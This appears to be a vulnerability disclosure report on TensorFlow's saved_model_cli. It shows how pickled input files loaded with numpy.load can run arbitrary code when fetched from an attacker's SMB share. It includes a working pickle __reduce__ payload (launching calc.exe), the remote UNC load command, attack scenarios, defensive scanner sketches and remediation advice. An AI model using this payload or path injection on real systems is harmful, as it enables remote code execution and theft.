TensorFlow - Version 2.21.0 / Remote Code Execution (RCE) via Insecure Deserialization based on sink numpy.load and saved_model_cli run --inputs as Entry Point
Below is one (1) way to reproduce RCE in TensorFlow using an SMB share controlled by an attacker. No third party needs to modify local files on the victim machine for code to execute during deserialization.
For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).
Note: While this vulnerability is specifically verified and reported on version 2.21.0, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.
Introduction
TensorFlow is an industry-leading, end-to-end open-source package for machine learning and artificial intelligence, originally developed by the Google Brain team. It features a comprehensive ecosystem of tools, libraries, and community resources that allows researchers and engineers to push the state-of-the-art in deep learning, computer vision, natural language processing, and robotic automation.
Widely adopted across Fortune 500 companies, research labs, and cloud ecosystems, TensorFlow forms the core backbone of critical inference pipelines and MLOps workflows. Given its deployment scaling from edge devices to high-performance GPU/TPU clusters, ensuring the security of its administrative and graph utilities—like saved_model_cli—is paramount to preventing supply chain infrastructure breaches.
Vulnerability Description
TensorFlow's saved_model_cli tool is a built-in command-line utility used to inspect and execute SavedModel graphs. With the run subcommand, users pass input files via the --inputs flag. Internally, each user-specified file is opened with the generic file_io.FileIO reader and handed to numpy.load() with allow_pickle=True hardcoded.
This enables an infrastructure-level Remote Code Execution (RCE) vector: If an attacker can convince a user or automated pipeline to reference a remotely hosted and maliciously crafted .npy or .npz file containing a pickled payload, arbitrary Python code will be executed in the context of the user or system running the tool. By taking advantage of remote file access over network protocols (like SMB via UNC Windows paths), the attacker circumvents local boundaries, eliminating the need to have write access to the local machine’s file system.
The vulnerable code in tensorflow/python/tools/saved_model_cli.py:
def load_inputs_from_input_arg_string(inputs_str, input_exprs_str,
                                      input_examples_str):
  # ...
  for input_tensor_key, (filename, variable_name) in inputs.items():
    data = np.load(file_io.FileIO(filename, mode='rb'), allow_pickle=True)  # pylint: disable=unexpected-keyword-arg
    # ...
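To make the risk concrete, the following minimal sketch uses only the standard-library pickle module and a harmless callable. It illustrates that unpickling calls whatever callable __reduce__ names, with the stored arguments. The class name Marker and the choice of sorted are illustrative assumptions, not part of TensorFlow or NumPy. With allow_pickle=True, numpy.load falls back to pickle for files that are not in .npy or .npz format, so the same mechanism applies to the sink above.

```python
import pickle


class Marker:
    """Illustrative class: __reduce__ tells pickle how to rebuild the object."""

    def __reduce__(self):
        # pickle stores "call sorted([3, 1, 2])"; the call happens at load time.
        return (sorted, ([3, 1, 2],))


blob = pickle.dumps(Marker())

# Loading does not return a Marker: it returns the result of the stored call.
result = pickle.loads(blob)
print(result)  # prints [1, 2, 3]
```

Replacing the harmless callable with one that runs a shell command is all an attacker needs, which is why the content of the file, not its extension, determines the outcome.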
Technical Impact Analysis
Project Purpose & Context
TensorFlow is a core, industry-standard machine learning framework extensively used worldwide for training, deploying, and serving deep learning models. saved_model_cli specifically is a standard maintenance tool frequently deployed inside CI/CD pipelines, MLOps orchestration systems, and individual developer laptops for quick sanity-checking and executing inputs on .pb (SavedModel) resources.
Platform & Deployment Environment
This vulnerability affects the core Python package across all operating systems due to the use of numpy.load(..., allow_pickle=True). Exploitation is especially critical on Windows workstations, servers, and distributed nodes, since file_io.FileIO accepts Windows UNC paths and resolves remote SMB paths transparently, fetching the payload over port 445 without a pre-mounted volume.
Comprehensive Risk Assessment
The overall risk is heavily exacerbated by the context. Automated MLOps evaluation frameworks frequently ingest automated parameters to test dynamically built models. Exposing saved_model_cli functionality inside internal microservices or unauthenticated local validation hooks can immediately yield high-privilege code execution to an attacker without triggering conventional local file upload alarms.
Attack Scenario
Who wants to exploit a particular vulnerability?
A sophisticated attacker, rogue data scientist, or malicious insider with access to the input pipeline of an automated ML system, or social-engineering actors targeting ML engineers locally.
For what gain?
To breach the ML infrastructure, exfiltrate proprietary model architectures, steal datasets, manipulate system predictions, or pivot further into a corporate internal network.
In what way?
The attacker sets up a publicly accessible or internally reachable SMB share (e.g., on a malicious Raspberry Pi or through a compromised internal node). They host a maliciously crafted Python payload serialized into a .npy file. They then inject or supply the path (\\?\UNC\192.168.1.90\lab_share\exploit_payload.npy) to the --inputs flag used by the saved_model_cli utility. When the automation script (or tricked developer) executes the command, TensorFlow transparently resolves the UNC path over the network, reads the pickled contents, and triggers remote code execution dynamically via numpy.load(allow_pickle=True).
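For defenders, it helps to see which remote host such a path points at. The sketch below uses only the Python standard library to extract the server and share from a UNC-style string like the one in this scenario. The function name unc_target is hypothetical, and the parsing is a simplification that assumes the two common Windows forms (\\server\share\... and \\?\UNC\server\share\...).

```python
EXTENDED_UNC = "\\\\?\\UNC\\"  # the literal prefix \\?\UNC\


def unc_target(path):
    """Return (server, share) for a UNC-style path, or None for anything else."""
    normalized = path.replace("/", "\\")
    if normalized.upper().startswith(EXTENDED_UNC):
        rest = normalized[len(EXTENDED_UNC):]
    elif (normalized.startswith("\\\\")
          and not normalized.startswith(("\\\\?\\", "\\\\.\\"))):
        rest = normalized[2:]
    else:
        return None  # drive-letter, relative, or device path
    parts = rest.split("\\")
    if len(parts) < 2 or not parts[0] or not parts[1]:
        return None
    return parts[0], parts[1]


print(unc_target(r"\\?\UNC\192.168.1.90\lab_share\exploit_payload.npy"))
```

A wrapper around saved_model_cli could log or reject any --inputs value for which this function returns a host that is not on an allowlist.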
Reproduction Steps
1. On the Raspberry (attacker) - IP 192.168.1.90
kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
kw0@kw0l4b:~ $
Create the exploit.py script that generates exploit_payload.npy:
import pickle
import os

class Exploit:
    def __reduce__(self):
        # Trigger a visible action (launching Calculator on Windows)
        return (eval, ("__import__('os').system('calc.exe')",))

payload = Exploit()
with open('/home/kw0/lab_attack/exploit_payload.npy', 'wb') as f:
    pickle.dump(payload, f)

print("Payload generated: /home/kw0/lab_attack/exploit_payload.npy")
Run the script:
python exploit.py
2. On Windows (victim) - IP 192.168.1.88
- Create a .venv, activate it, and install the latest version (2.21.0) of TensorFlow using pip install tensorflow.
- Create a dummy_model folder using python create_model.py, so that the --dir flag points to a valid SavedModel and does not raise errors.
- Then consume the attacker-controlled payload remotely:
saved_model_cli run --dir dummy_model --tag_set serve --signature_def serving_default --inputs "x=\\?\UNC\192.168.1.90\lab_share\exploit_payload.npy"
Executive Summary: Insecure Deserialization Vulnerability in saved_model_cli
The research identifies a critical Remote Code Execution (RCE) vector stemming from the insecure use of the numpy.load(..., allow_pickle=True) function within TensorFlow's saved_model_cli tool.
- Root Cause: The loading of data using pickle (an inherently insecure serialization format) when processing input files, without prior validation of the content.
- Exploitation Mechanism: The tool allows a user to specify a file path. Because it accepts network paths (such as SMB/UNC on Windows) as well as local paths to malicious files, the tool deserializes the content and executes arbitrary code in the context of the user invoking the command.
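One way to validate content before loading is to walk the pickle opcodes without executing them. The sketch below is a heuristic built on the standard-library pickletools module; the function name referenced_globals is hypothetical. It lists the importable names a stream refers to, so a reference such as builtins.eval stands out. A crafted pickle can evade this simple string tracking, so an empty result is not proof of safety.

```python
import pickle
import pickletools


def referenced_globals(data):
    """List module.name references in a pickle stream without executing it."""
    names = []
    strings = []  # string arguments seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # pickletools reports the argument as "module name"
            names.append(arg.replace(" ", "."))
        elif opcode.name == "STACK_GLOBAL":
            # protocol 4+ pushes module and name as two strings first
            if len(strings) >= 2:
                names.append(strings[-2] + "." + strings[-1])
        elif isinstance(arg, str):
            strings.append(arg)
    return names


# Pickling a builtin function stores only a reference to it.
sample = pickle.dumps(sorted, protocol=4)
print(referenced_globals(sample))
```

Plain array data should not need to reference callables like eval or os.system, so any such name in an input file is a strong reason to refuse it.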
Analysis of Scope and Security Implications
Although the Proof of Concept (PoC) uses SMB to demonstrate the impact, the attack surface is significantly broader and more dangerous than it appears at first glance.
1. Infection Scenarios
- Supply Chain Attacks: An attacker could publish malicious "pre-trained" models or .npy files on public repositories (Hugging Face, GitHub, PyPI). Any user or automated pipeline that passes such a file to saved_model_cli run --inputs would be compromised as soon as the file is loaded.
- AI Botnets: Given that Data Science environments often have high computing power (GPUs), large-scale exploitation through the deployment of "lure" models would enable the creation of botnets specifically designed for cryptocurrency mining or DDoS attacks, utilizing high-performance computing infrastructure.
- Targeted Info Stealers: AI and Data Science engineers often handle sensitive datasets, cloud service API keys (AWS, GCP, Azure), and intellectual property (model architectures). This RCE allows for the mass exfiltration of authentication tokens and environment variables (.env) from high-trust workstations.
2. Factors Exacerbating Risk
- Integration in CI/CD: Many MLOps workflows use saved_model_cli to automatically validate models before pushing them to production. An attacker who manages to inject a file path into a CI/CD system can escalate privileges into the deployment environment, pivoting into the internal corporate network.
- Protocol Transparency: Because UNC paths often require no additional authentication in internal environments, code execution occurs without any prior operating system alert: the trusted tool itself makes the call to the remote resource.
Conclusion and Recommendation
This vulnerability is of critical severity. The use of pickle to deserialize user-controlled input files is a high-risk practice that TensorFlow must remediate urgently.
Suggested actions for the development team:
- Disable allow_pickle=True by default in any input file loading.
- Implement signature validation: Ensure that only signed model files or those from verified sources can be processed.
- Input Sanitization: Limit allowed file schemes and prohibit access to UNC paths or unauthorized network protocols within CLI tools.
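As a rough illustration of how these checks could be combined in front of the loader, the sketch below uses only the Python standard library. All function names are hypothetical, and the pinned SHA-256 digest is a simpler stand-in for real signature verification. The header check alone is not sufficient, since a genuine .npy file holding object arrays can still embed pickled data, so it is meant to complement loading with allow_pickle=False, not to replace it.

```python
import hashlib
import hmac

NPY_MAGIC = b"\x93NUMPY"   # prefix of every .npy file
ZIP_MAGIC = b"PK\x03\x04"  # .npz files are zip archives


def is_remote_path(path):
    """Flag UNC-style paths and anything that carries a URL scheme."""
    return path.startswith(("\\\\", "//")) or "://" in path


def has_numpy_header(data):
    """True if the bytes start like a .npy or .npz file (not a raw pickle)."""
    return data.startswith((NPY_MAGIC, ZIP_MAGIC))


def matches_pinned_digest(data, expected_sha256_hex):
    """Compare the content hash with a digest obtained from a trusted source."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_sha256_hex.lower())


def accept_input(path, data, expected_sha256_hex):
    """Accept only local files with a NumPy header and the expected digest."""
    return (not is_remote_path(path)
            and has_numpy_header(data)
            and matches_pinned_digest(data, expected_sha256_hex))
```

In this sketch the raw pickle produced by the PoC would be rejected twice: its path is a UNC path, and its first bytes are a pickle protocol marker instead of the NumPy magic string.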